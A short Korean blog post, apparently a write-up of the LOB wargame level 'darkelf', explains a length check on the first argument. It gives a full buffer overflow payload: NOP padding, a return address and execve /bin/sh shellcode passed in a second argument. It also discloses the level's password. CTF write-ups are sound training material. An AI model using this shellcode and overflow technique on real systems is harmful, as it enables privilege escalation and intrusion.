Wargame/CTF(Capture The Flag)

LOB darklf

𝓛𝓾𝓬𝓮𝓽𝓮_𝓢𝓽𝓮𝓵𝓵𝓪 2015. 9. 15.

728x90

소스를 열어보면 일단 전문제랑 비슷한데 길이를 체크한다.

첫번째인자 값의 길이를 확인하여 48글자보다 크면 나와버리는 것을 확인 할수 있다.

일단 앞과 똑같이 진행하고

payload를 작성때

./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') <= 첫번째 인자(buffer+AAAA+ret주소값)

$(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')<=2번째인자( NOP+쉘코드)

password : kernel crashed

728x90

저작자표시 (새창열림)

'Wargame > CTF(Capture The Flag)' 카테고리의 다른 글

pwnable.kr shellshock (0)	2015.10.11
LOB orge (0)	2015.09.15
LOB wolfman (0)	2015.09.15
LOB orc (0)	2015.09.15
LOB goblin (0)	2015.09.15

LOB darklf

'Wargame > CTF(Capture The Flag)' 카테고리의 다른 글

댓글

티스토리툴바